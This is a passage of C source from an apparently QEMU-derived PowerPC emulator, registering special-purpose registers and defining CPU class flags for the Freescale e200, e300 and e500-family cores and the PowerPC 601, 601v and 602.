&spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_DBCNT, "DBCNT", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_DBCR3, "DBCR3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_L1CFG0, "L1CFG0", &spr_read_generic, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_L1CSR0, "L1CSR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_L1FINV0, "L1FINV0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_TLB0CFG, "TLB0CFG", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_TLB1CFG, "TLB1CFG", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC3, "IAC3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC4, "IAC4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MMUCSR0, "MMUCSR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* TOFIX */ spr_register(env, SPR_BOOKE_DSRR0, "DSRR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_DSRR1, "DSRR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); env->nb_tlb = 64; env->nb_ways = 1; env->id_tlbs = 0; env->tlb_type = TLB_EMB; init_excp_e200(env, 0xFFFF0000UL); env->dcache_line_size = 32; env->icache_line_size = 32; /* XXX: TODO: allocate internal IRQ controller */ } POWERPC_FAMILY(e200)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "e200 core"; pcc->init_proc = init_proc_e200; pcc->check_pow = check_pow_hid0; /* * XXX: unimplemented instructions: * dcblc * dcbtlst * dcbtstls * icblc * icbtls * tlbivax * all SPE multiply-accumulate instructions */ pcc->insns_flags = PPC_INSNS_BASE | PPC_ISEL | PPC_SPE | PPC_SPE_SINGLE | PPC_WRTEE | PPC_RFDI | PPC_CACHE | PPC_CACHE_LOCK | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_TLBSYNC | PPC_TLBIVAX | PPC_BOOKE; pcc->msr_mask = (1ull << MSR_UCLE) | (1ull << MSR_SPE) | (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_DWE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR); pcc->mmu_model = POWERPC_MMU_BOOKE206; pcc->excp_model = POWERPC_EXCP_BOOKE; pcc->bus_model = PPC_FLAGS_INPUT_BookE; pcc->flags = POWERPC_FLAG_SPE | POWERPC_FLAG_CE | POWERPC_FLAG_UBLE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } static void init_proc_e300(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_603(env); /* Time base */ gen_tbl(env); /* hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 
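                 /* (The e300 follows the 603e programming model: the same
                  *  SPR set, 6xx soft TLB and POWERPC_EXCP_603 exception
                  *  model appear in the class init below.) */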
0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID2, "HID2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Breakpoints */ /* XXX : not implemented */ spr_register(env, SPR_DABR, "DABR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_DABR2, "DABR2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_IABR2, "IABR2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_IBCR, "IBCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_DBCR, "DBCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_high_BATs(env); gen_6xx_7xx_soft_tlb(env, 64, 2); init_excp_603(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(e300)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "e300 core"; pcc->init_proc = init_proc_e300; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_6xx_TLB | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_TGPR) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_AL) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_6xx; pcc->excp_model = POWERPC_EXCP_603; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_TGPR | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_BUS_CLK; } static void spr_write_mas73(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv val = tcg_temp_new(tcg_ctx); tcg_gen_ext32u_tl(tcg_ctx, val, cpu_gpr[gprn]); gen_store_spr(tcg_ctx, SPR_BOOKE_MAS3, val); tcg_gen_shri_tl(tcg_ctx, val, cpu_gpr[gprn], 32); gen_store_spr(tcg_ctx, SPR_BOOKE_MAS7, val); tcg_temp_free(tcg_ctx, val); } static void spr_read_mas73(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv mas7 = tcg_temp_new(tcg_ctx); TCGv mas3 = tcg_temp_new(tcg_ctx); gen_load_spr(tcg_ctx, mas7, SPR_BOOKE_MAS7); tcg_gen_shli_tl(tcg_ctx, mas7, mas7, 32); gen_load_spr(tcg_ctx, mas3, SPR_BOOKE_MAS3); tcg_gen_or_tl(tcg_ctx, cpu_gpr[gprn], mas3, mas7); tcg_temp_free(tcg_ctx, mas3); tcg_temp_free(tcg_ctx, mas7); } enum fsl_e500_version { fsl_e500v1, fsl_e500v2, fsl_e500mc, fsl_e5500, fsl_e6500, }; static void init_proc_e500(CPUPPCState *env, int version) { uint32_t tlbncfg[2]; uint64_t ivor_mask; uint64_t ivpr_mask = 0xFFFF0000ULL; uint32_t l1cfg0 = 0x3800 /* 8 ways */ | 0x0020; /* 32 kb */ uint32_t l1cfg1 = 0x3800 /* 8 ways */ | 0x0020; /* 32 kb */ uint32_t mmucfg = 0; int i; /* Time base */ gen_tbl(env); /* * XXX The e500 doesn't implement IVOR7 and IVOR9, but doesn't * complain when accessing them. 
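     * The ivor_mask values chosen below therefore leave the IVOR7/IVOR9
     * bits set; the strict variant (0xFD7F = 0xFFFF with bits 7 and 9
     * cleared) would be: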
* gen_spr_BookE(env, 0x0000000F0000FD7FULL); */ switch (version) { case fsl_e500v1: case fsl_e500v2: default: ivor_mask = 0x0000000F0000FFFFULL; break; case fsl_e500mc: case fsl_e5500: ivor_mask = 0x000003FE0000FFFFULL; break; case fsl_e6500: ivor_mask = 0x000003FF0000FFFFULL; break; } gen_spr_BookE(env, ivor_mask); gen_spr_usprg3(env); /* Processor identification */ spr_register(env, SPR_BOOKE_PIR, "PIR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_pir, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_SPEFSCR, "SPEFSCR", &spr_read_spefscr, &spr_write_spefscr, &spr_read_spefscr, &spr_write_spefscr, 0x00000000); /* Memory management */ env->nb_pids = 3; env->nb_ways = 2; env->id_tlbs = 0; switch (version) { case fsl_e500v1: tlbncfg[0] = gen_tlbncfg(2, 1, 1, 0, 256); tlbncfg[1] = gen_tlbncfg(16, 1, 9, TLBnCFG_AVAIL | TLBnCFG_IPROT, 16); break; case fsl_e500v2: tlbncfg[0] = gen_tlbncfg(4, 1, 1, 0, 512); tlbncfg[1] = gen_tlbncfg(16, 1, 12, TLBnCFG_AVAIL | TLBnCFG_IPROT, 16); break; case fsl_e500mc: case fsl_e5500: tlbncfg[0] = gen_tlbncfg(4, 1, 1, 0, 512); tlbncfg[1] = gen_tlbncfg(64, 1, 12, TLBnCFG_AVAIL | TLBnCFG_IPROT, 64); break; case fsl_e6500: mmucfg = 0x6510B45; env->nb_pids = 1; tlbncfg[0] = 0x08052400; tlbncfg[1] = 0x40028040; break; default: cpu_abort(env_cpu(env), "Unknown CPU: " TARGET_FMT_lx "\n", env->spr[SPR_PVR]); } /* Cache sizes */ switch (version) { case fsl_e500v1: case fsl_e500v2: env->dcache_line_size = 32; env->icache_line_size = 32; break; case fsl_e500mc: case fsl_e5500: env->dcache_line_size = 64; env->icache_line_size = 64; l1cfg0 |= 0x1000000; /* 64 byte cache block size */ l1cfg1 |= 0x1000000; /* 64 byte cache block size */ break; case fsl_e6500: env->dcache_line_size = 32; env->icache_line_size = 32; l1cfg0 |= 0x0F83820; l1cfg1 |= 0x0B83820; break; default: cpu_abort(env_cpu(env), "Unknown CPU: " TARGET_FMT_lx "\n", env->spr[SPR_PVR]); } gen_spr_BookE206(env, 0x000000DF, tlbncfg, mmucfg); /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_BBEAR, "BBEAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_BBTAR, "BBTAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_MCAR, "MCAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_MCSR, "MCSR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_NPIDR, "NPIDR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_BUCSR, "BUCSR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_L1CFG0, "L1CFG0", &spr_read_generic, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, l1cfg0); spr_register(env, SPR_Exxx_L1CFG1, "L1CFG1", &spr_read_generic, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, l1cfg1); spr_register(env, SPR_Exxx_L1CSR0, "L1CSR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, 
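                 /*
                  * (Note on the TLB geometry switch above, assuming the
                  * gen_tlbncfg(assoc, minsize, maxsize, flags, nentries)
                  * helper defined earlier in this file and the Book E
                  * page-size coding of 4^n KiB: e.g. for the e500v1,
                  * gen_tlbncfg(16, 1, 9, TLBnCFG_AVAIL | TLBnCFG_IPROT, 16)
                  * describes TLB1 as 16 fully-associative entries with
                  * variable page sizes from 4 KiB (code 1) to 256 MiB
                  * (code 9), protected against broadcast invalidation.)
                  */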
&spr_write_e500_l1csr0, 0x00000000); spr_register(env, SPR_Exxx_L1CSR1, "L1CSR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_e500_l1csr1, 0x00000000); spr_register(env, SPR_BOOKE_MCSRR0, "MCSRR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_MCSRR1, "MCSRR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_MMUCSR0, "MMUCSR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_booke206_mmucsr0, 0x00000000); spr_register(env, SPR_BOOKE_EPR, "EPR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); /* XXX better abstract into Emb.xxx features */ if ((version == fsl_e5500) || (version == fsl_e6500)) { spr_register(env, SPR_BOOKE_EPCR, "EPCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_MAS7_MAS3, "MAS7_MAS3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_mas73, &spr_write_mas73, 0x00000000); ivpr_mask = (target_ulong)~0xFFFFULL; } if (version == fsl_e6500) { /* Thread identification */ spr_register(env, SPR_TIR, "TIR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_BOOKE_TLB0PS, "TLB0PS", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000004); spr_register(env, SPR_BOOKE_TLB1PS, "TLB1PS", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x7FFFFFFC); } env->nb_tlb = 0; env->tlb_type = TLB_MAS; for (i = 0; i < BOOKE206_MAX_TLBN; i++) { env->nb_tlb += booke206_tlb_size(env, i); } init_excp_e200(env, ivpr_mask); /* Allocate hardware IRQ controller */ ppce500_irq_init(env_archcpu(env)); } static void init_proc_e500v1(CPUPPCState *env) { init_proc_e500(env, fsl_e500v1); } POWERPC_FAMILY(e500v1)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "e500v1 core"; pcc->init_proc = init_proc_e500v1; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_ISEL | PPC_SPE | PPC_SPE_SINGLE | PPC_WRTEE | PPC_RFDI | PPC_CACHE | PPC_CACHE_LOCK | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_TLBSYNC | PPC_TLBIVAX | PPC_MEM_SYNC; pcc->insns_flags2 = PPC2_BOOKE206; pcc->msr_mask = (1ull << MSR_UCLE) | (1ull << MSR_SPE) | (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_DWE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR); pcc->mmu_model = POWERPC_MMU_BOOKE206; pcc->excp_model = POWERPC_EXCP_BOOKE; pcc->bus_model = PPC_FLAGS_INPUT_BookE; pcc->flags = POWERPC_FLAG_SPE | POWERPC_FLAG_CE | POWERPC_FLAG_UBLE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } static void init_proc_e500v2(CPUPPCState *env) { init_proc_e500(env, fsl_e500v2); } POWERPC_FAMILY(e500v2)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "e500v2 core"; pcc->init_proc = init_proc_e500v2; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_ISEL | PPC_SPE | PPC_SPE_SINGLE | PPC_SPE_DOUBLE | PPC_WRTEE | PPC_RFDI | PPC_CACHE | PPC_CACHE_LOCK | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_TLBSYNC | PPC_TLBIVAX | PPC_MEM_SYNC; pcc->insns_flags2 = PPC2_BOOKE206; pcc->msr_mask = (1ull << MSR_UCLE) | (1ull << MSR_SPE) | (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_DWE) | (1ull << MSR_DE) | (1ull << MSR_FE1) 
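                    /* (msr_mask enumerates the MSR bits this core
                     *  implements; writes to bits outside the mask are
                     *  discarded.) */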
                    | (1ull << MSR_IR) | (1ull << MSR_DR);
#if 0
    pcc->mmu_model = POWERPC_MMU_BOOKE206;
#else
    /* disable mmu */
    pcc->mmu_model = POWERPC_MMU_REAL;
#endif
    pcc->excp_model = POWERPC_EXCP_BOOKE;
    pcc->bus_model = PPC_FLAGS_INPUT_BookE;
    pcc->flags = POWERPC_FLAG_SPE | POWERPC_FLAG_CE | POWERPC_FLAG_UBLE |
                 POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK;
}

static void init_proc_e500mc(CPUPPCState *env)
{
    init_proc_e500(env, fsl_e500mc);
}

POWERPC_FAMILY(e500mc)(CPUClass *oc, void *data)
{
    PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc);

    // dc->desc = "e500mc core";
    pcc->init_proc = init_proc_e500mc;
    pcc->check_pow = check_pow_none;
    pcc->insns_flags = PPC_INSNS_BASE | PPC_ISEL | PPC_MFTB | PPC_WRTEE |
                       PPC_RFDI | PPC_RFMCI | PPC_CACHE | PPC_CACHE_LOCK |
                       PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA |
                       PPC_FLOAT | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE |
                       PPC_FLOAT_FSEL | PPC_FLOAT_STFIWX | PPC_WAIT |
                       PPC_MEM_TLBSYNC | PPC_TLBIVAX | PPC_MEM_SYNC;
    pcc->insns_flags2 = PPC2_BOOKE206 | PPC2_PRCNTL;
    pcc->msr_mask = (1ull << MSR_GS) | (1ull << MSR_UCLE) | (1ull << MSR_CE) |
                    (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) |
                    (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_DE) |
                    (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR) |
                    (1ull << MSR_PX) | (1ull << MSR_RI);
    pcc->mmu_model = POWERPC_MMU_BOOKE206;
    pcc->excp_model = POWERPC_EXCP_BOOKE;
    pcc->bus_model = PPC_FLAGS_INPUT_BookE;
    /* FIXME: figure out the correct flag for e500mc */
    pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DE |
                 POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK;
}

#ifdef TARGET_PPC64
static void init_proc_e5500(CPUPPCState *env)
{
    init_proc_e500(env, fsl_e5500);
}

POWERPC_FAMILY(e5500)(CPUClass *oc, void *data)
{
    PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc);

    // dc->desc = "e5500 core";
    pcc->init_proc = init_proc_e5500;
    pcc->check_pow = check_pow_none;
    pcc->insns_flags = PPC_INSNS_BASE | PPC_ISEL | PPC_MFTB | PPC_WRTEE |
                       PPC_RFDI | PPC_RFMCI | PPC_CACHE | PPC_CACHE_LOCK |
                       PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA |
                       PPC_FLOAT | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE |
                       PPC_FLOAT_FSEL | PPC_FLOAT_STFIWX | PPC_WAIT |
                       PPC_MEM_TLBSYNC | PPC_TLBIVAX | PPC_MEM_SYNC |
                       PPC_64B | PPC_POPCNTB | PPC_POPCNTWD;
    pcc->insns_flags2 = PPC2_BOOKE206 | PPC2_PRCNTL | PPC2_PERM_ISA206 |
                        PPC2_FP_CVT_S64;
    pcc->msr_mask = (1ull << MSR_CM) | (1ull << MSR_GS) | (1ull << MSR_UCLE) |
                    (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) |
                    (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) |
                    (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) |
                    (1ull << MSR_DR) | (1ull << MSR_PX) | (1ull << MSR_RI);
    pcc->mmu_model = POWERPC_MMU_BOOKE206;
    pcc->excp_model = POWERPC_EXCP_BOOKE;
    pcc->bus_model = PPC_FLAGS_INPUT_BookE;
    /* FIXME: figure out the correct flag for e5500 */
    pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DE |
                 POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK;
}

static void init_proc_e6500(CPUPPCState *env)
{
    init_proc_e500(env, fsl_e6500);
}

POWERPC_FAMILY(e6500)(CPUClass *oc, void *data)
{
    PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc);

    // dc->desc = "e6500 core";
    pcc->init_proc = init_proc_e6500;
    pcc->check_pow = check_pow_none;
    pcc->insns_flags = PPC_INSNS_BASE | PPC_ISEL | PPC_MFTB | PPC_WRTEE |
                       PPC_RFDI | PPC_RFMCI | PPC_CACHE | PPC_CACHE_LOCK |
                       PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA |
                       PPC_FLOAT | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE |
                       PPC_FLOAT_FSEL | PPC_FLOAT_STFIWX | PPC_WAIT |
                       PPC_MEM_TLBSYNC | PPC_TLBIVAX | PPC_MEM_SYNC |
                       PPC_64B | PPC_POPCNTB | PPC_POPCNTWD | PPC_ALTIVEC;
    pcc->insns_flags2 = PPC2_BOOKE206 | PPC2_PRCNTL | PPC2_PERM_ISA206 |
                        PPC2_FP_CVT_S64 | PPC2_ATOMIC_ISA206;
    pcc->msr_mask = (1ull << MSR_CM) | (1ull << MSR_GS) | (1ull << MSR_UCLE) |
                    (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) |
                    (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) |
                    (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IS) |
                    (1ull << MSR_DS) | (1ull << MSR_PX) | (1ull << MSR_RI) |
                    (1ull << MSR_VR);
    pcc->mmu_model = POWERPC_MMU_BOOKE206;
    pcc->excp_model = POWERPC_EXCP_BOOKE;
    pcc->bus_model = PPC_FLAGS_INPUT_BookE;
    pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DE | POWERPC_FLAG_PMM |
                 POWERPC_FLAG_BUS_CLK | POWERPC_FLAG_VRE;
}
#endif

/* Non-embedded PowerPC */

#define POWERPC_MSRR_601 (0x0000000000001040ULL)

static void init_proc_601(CPUPPCState *env)
{
    gen_spr_ne_601(env);
    gen_spr_sdr1(env);
    gen_spr_601(env);
    /* Hardware implementation registers */
    /* XXX : not implemented */
    spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_hid0_601, 0x80010080);
    /* XXX : not implemented */
    spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic, 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_601_HID2, "HID2", SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic, 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_601_HID5, "HID5", SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic, 0x00000000);
    /* Memory management */
    init_excp_601(env);
    /*
     * XXX: beware that the dcache line size is 64 bytes,
     *      but dcbz uses 32-byte "sectors"
     * XXX: this breaks the clcs instruction!
     */
    env->dcache_line_size = 32;
    env->icache_line_size = 64;
    /* Allocate hardware IRQ controller */
    ppc6xx_irq_init(env_archcpu(env));
}

POWERPC_FAMILY(601)(CPUClass *oc, void *data)
{
    PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc);

    // dc->desc = "PowerPC 601";
    pcc->init_proc = init_proc_601;
    pcc->check_pow = check_pow_none;
    pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_POWER_BR |
                       PPC_FLOAT | PPC_CACHE | PPC_CACHE_ICBI |
                       PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO |
                       PPC_MEM_TLBIE | PPC_SEGMENT | PPC_EXTERN;
    pcc->msr_mask = (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) |
                    (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) |
                    (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) |
                    (1ull << MSR_DR);
    pcc->mmu_model = POWERPC_MMU_601;
    pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault;
    pcc->excp_model = POWERPC_EXCP_601;
    pcc->bus_model = PPC_FLAGS_INPUT_6xx;
    pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_RTC_CLK;
}

#define POWERPC_MSRR_601v (0x0000000000001040ULL)

static void init_proc_601v(CPUPPCState *env)
{
    init_proc_601(env);
    /* XXX : not implemented */
    spr_register(env, SPR_601_HID15, "HID15", SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic, 0x00000000);
}

POWERPC_FAMILY(601v)(CPUClass *oc, void *data)
{
    PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc);

    // dc->desc = "PowerPC 601v";
    pcc->init_proc = init_proc_601v;
    pcc->check_pow = check_pow_none;
    pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_POWER_BR |
                       PPC_FLOAT | PPC_CACHE | PPC_CACHE_ICBI |
                       PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO |
                       PPC_MEM_TLBIE | PPC_SEGMENT | PPC_EXTERN;
    pcc->msr_mask = (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) |
                    (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) |
                    (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) |
                    (1ull << MSR_DR);
    pcc->mmu_model = POWERPC_MMU_601;
    pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault;
    pcc->bus_model = PPC_FLAGS_INPUT_6xx;
    pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_RTC_CLK;
}

static void
init_proc_602(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_602(env); /* Time base */ gen_tbl(env); /* hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_6xx_7xx_soft_tlb(env, 64, 2); init_excp_602(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(602)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 602"; pcc->init_proc = init_proc_602; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_6xx_TLB | PPC_MEM_TLBSYNC | PPC_SEGMENT | 